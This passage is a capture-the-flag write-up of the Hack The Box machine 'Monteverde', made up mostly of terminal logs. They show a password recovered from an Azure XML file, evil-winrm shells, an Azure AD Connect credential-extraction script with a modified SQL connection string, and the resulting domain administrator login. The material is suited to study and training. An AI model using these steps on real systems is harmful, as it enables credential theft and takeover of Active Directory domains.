drw-rw-rw- 0 Fri Jan 3 08:14:28 2020 .
drw-rw-rw- 0 Fri Jan 3 08:14:28 2020 ..
# cd ../dgalanos
# ls
drw-rw-rw- 0 Fri Jan 3 08:15:23 2020 .
drw-rw-rw- 0 Fri Jan 3 08:15:23 2020 ..
#
user@kali:~/Documents/HTB-Labs/Monteverde$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>Let's try this with evil-winrm and user mhope as this is the only normal user with admin rights per the information returned by enum4linux.
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhopeuser@kali:~/Documents/HTB-Labs/Monteverde$ evil-winrm -i monteverde.htb -u mhope -p '4n0therD4y@n0th3r$' -s ./ps1_scripts/ -e ./exe_files/
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>
cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> Get-Content -Path .\user.txt
496197********************f212f2We have found the user flag. At this point, we can try to escalate our privileges.
After enumerating services, groups and accounts, there was a possibility this domain controller could have ADSync tasks to the assigned Azure Tenant, along with the Azure files found under mhope that are related to the AzureRM Context and TokenCache.dat.
This information points us to try and exploit AzureAD Connect and ADSync to extract the administrator account password.
Remember to verify the Execution Policy in PowerShell before running any script. Since we are in a PowerShell session through WinRM, we can leverage its commands or functions.
To verify the Execution Policy:
Get-ExecutionPolicy -List
To change it for the current user:
Set-ExecutionPolicy Bypass -Scope CurrentUser
Changing this without specifying the scope will failed if the user does not have Administrator privileges.
Following the blog Azure AD Connect for RedTeamers provided in the overview section, lead us to a few failed attempts:
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload ./ps1_scripts/azuread_decrypt_msol.ps1
Info: Uploading ./ps1_scripts/azuread_decrypt_msol.ps1 to C:\Users\mhope\Downloads\azuread_decrypt_msol.ps1
Data: 2328 bytes of 2328 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> Get-ExecutionPolicy -List
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Undefined
CurrentUser Undefined
LocalMachine RemoteSigned
*Evil-WinRM* PS C:\Users\mhope\Downloads> Set-ExecutionPolicy Bypass -Scope CurrentUser
*Evil-WinRM* PS C:\users\mhope\Downloads> .\azuread_decrypt_msol.ps1
AD Connect Sync Credential Extract POC (@_xpn_)
powershell.exe : Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error
+ CategoryInfo : NotSpecified: (Exception calli...specific error :String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
occurred while establishing a connection to SQL Server. The server was not found or was not
accessible. Verify that the instance name is correct and that SQL Server is configured to allow
remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance
Specified)"
At C:\users\mhope\Downloads\shell.ps1:4 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : SqlException
Exception calling "ExecuteReader" with "0" argument(s): "ExecuteReader requires an open and
available Connection. The connection's current state is closed."
At C:\users\mhope\Downloads\shell.ps1:7 char:1
+ $reader = $cmd.ExecuteReader()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : InvalidOperationException
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:8 char:1
+ $reader.Read() | Out-Null
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:9 char:1
+ $key_id = $reader.GetInt32(0)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:10 char:1
+ $instance_id = $reader.GetGuid(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:11 char:1
+ $entropy = $reader.GetGuid(2)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:12 char:1
+ $reader.Close()
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Exception calling "ExecuteReader" with "0" argument(s): "ExecuteReader requires an open and
available Connection. The connection's current state is closed."
At C:\users\mhope\Downloads\shell.ps1:16 char:1
+ $reader = $cmd.ExecuteReader()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : InvalidOperationException
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:17 char:1
+ $reader.Read() | Out-Null
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:18 char:1
+ $config = $reader.GetString(0)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:19 char:1
+ $crypted = $reader.GetString(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:20 char:1
+ $reader.Close()
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot convert argument "guidEntropy", with value: "", for "LoadKeySet" to type "System.Guid":
"Cannot convert null to type "System.Guid"."
At C:\users\mhope\Downloads\shell.ps1:24 char:1
+ $km.LoadKeySet($entropy, $instance_id, $key_id)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at CKeyManager.GetActiveCredentialKey(CKeyManager* , CKey** )
at Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager.GetActiveCredentialKey(Key& ppkey)
at CallSite.Target(Closure , CallSite , Object , PSReference )
at System.Dynamic.UpdateDelegates.UpdateAndExecute2[T0,T1,TRet](CallSite site, T0 arg0, T1 arg1)
at System.Management.Automation.Interpreter.DynamicInstruction`3.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.Interpreter.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.LightLambda.RunVoid1[T0](T0 arg0)
at System.Management.Automation.DlrScriptCommandProcessor.RunClause(Action`1 clause, Object dollarUnderbar, Object inputToProcess)
at System.Management.Automation.DlrScriptCommandProcessor.Complete()
at System.Management.Automation.CommandProcessorBase.DoComplete()
at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(CommandProcessorBase commandRequestingUpstreamCommandsToStop)
at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(Object input)
at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
at System.Threading.ThreadHelper.ThreadStart()Basically the SQL connection did not work. After digging a little, the syntax on the connection was not good due to the SQL version. We had to tweak the connection from:
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb). \ADSync;Initial Catalog=ADSync"
To the following:
$server = 127.0.0.1; $db = "ADSync"; $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = $server; Database = $db; Initial Catalog=$db; Integrated Security = True;"
Now, our second attempt after updating the uploaded script:
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload ./ps1_scripts/azuread_decrypt_msol2.ps1
Info: Uploading ./ps1_scripts/azuread_decrypt_msol2.ps1 to C:\Users\mhope\Downloads\azuread_decrypt_msol2.ps1
Data: 2404 bytes of 2404 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> Get-ExecutionPolicy -List
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Undefined
CurrentUser Bypass
LocalMachine RemoteSigned
*Evil-WinRM* PS C:\Users\mhope\Downloads> .\azuread_decrypt_msol2.ps1
AD Connect Sync Credential Extract POC (@_xpn_)
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
We got the Administrator credentials used to configure Azure AD Connect, so now we need to login as the Administrator using impacket-smbclient again.
user@kali:~/Documents/HTB-Labs/Monteverde$ impacket-smbclient MEGABANK/Administrator:"d0m@in4dminyeah!"@monteverde.htb
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
azure_uploads
C$
E$
IPC$
NETLOGON
SYSVOL
users$
# use C$
# ls
drw-rw-rw- 0 Fri Jan 3 00:11:23 2020 $Recycle.Bin
drw-rw-rw- 0 Fri Jan 3 00:13:00 2020 Documents and Settings
-rw-rw-rw- 1476395008 Mon Jan 13 14:40:45 2020 pagefile.sys
drw-rw-rw- 0 Fri Jan 3 00:11:23 2020 PerfLogs
drw-rw-rw- 0 Fri Jan 3 08:28:53 2020 Program Files
drw-rw-rw- 0 Thu Jan 2 17:39:00 2020 Program Files (x86)
drw-rw-rw- 0 Fri Jan 3 07:47:44 2020 ProgramData
drw-rw-rw- 0 Fri Jan 3 00:13:02 2020 Recovery
drw-rw-rw- 0 Thu Jan 2 16:54:11 2020 System Volume Information
drw-rw-rw- 0 Fri Jan 3 08:24:36 2020 Users
drw-rw-rw- 0 Fri Jan 3 07:47:45 2020 Windows
# cd Users
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Fri Jan 3 08:48:34 2020 .
drw-rw-rw- 0 Fri Jan 3 08:48:34 2020 ..
-rw-rw-rw- 282 Thu Jan 2 17:49:01 2020 desktop.ini
-rw-rw-rw- 32 Fri Jan 3 08:48:55 2020 root.txt
# get root.txt
# exit
root@CORP-VMGD13L12:~/Documents/HTB-Labs/Monteverde# cat root.txt
129096********************04a0bcAnd we have found the root flag!
This section was added on April 17, 2022 while reviewing my notes versus the approach I would have taken if I worked on this box now.
Another way to finish this box would've been by accessing the system through either impacket-smbexec or evil-winrm:
┌──(jxberrios 👿 back0ff)-[~/…/Monteverde]
└─$ evil-winrm -i monteverde.htb -u Administrator -p 'd0m@in4dminyeah!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path .
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 3:06 PM SQL Server Management Studio
d----- 1/2/2020 3:10 PM Visual Studio 2017
d----- 1/3/2020 5:28 AM WindowsPowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path ..\
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/2/2020 2:49 PM 3D Objects
d-r--- 1/2/2020 2:49 PM Contacts
d-r--- 1/3/2020 5:48 AM Desktop
d-r--- 1/3/2020 5:28 AM Documents
d-r--- 5/17/2021 3:13 AM Downloads
d-r--- 1/2/2020 2:49 PM Favorites
d-r--- 1/2/2020 2:49 PM Links
d-r--- 1/2/2020 2:49 PM Music
d-r--- 1/2/2020 2:49 PM Pictures
d-r--- 1/2/2020 2:49 PM Saved Games
d-r--- 1/2/2020 2:49 PM Searches
d-r--- 1/2/2020 2:49 PM Videos
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path ..\Desktop\
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-Content -Path ..\Desktop\root.txt
129096********************04a0bcIn this scenario, Adam Chester's POC is able to retrieve the credentials used to configure and run Azure AD Connect, we had the ability to retrieve the credentials for an account capable of performing a DCSync. But, this would not be achieved if the server running the Azure AD Connect service was configured properly and no others associated to misconfigurations.
As demonstrated by in his blog, there is always a risk with new technologies and even worse when best practices are not followed. At every deployment, evaluate each potential risk and do not rush it.
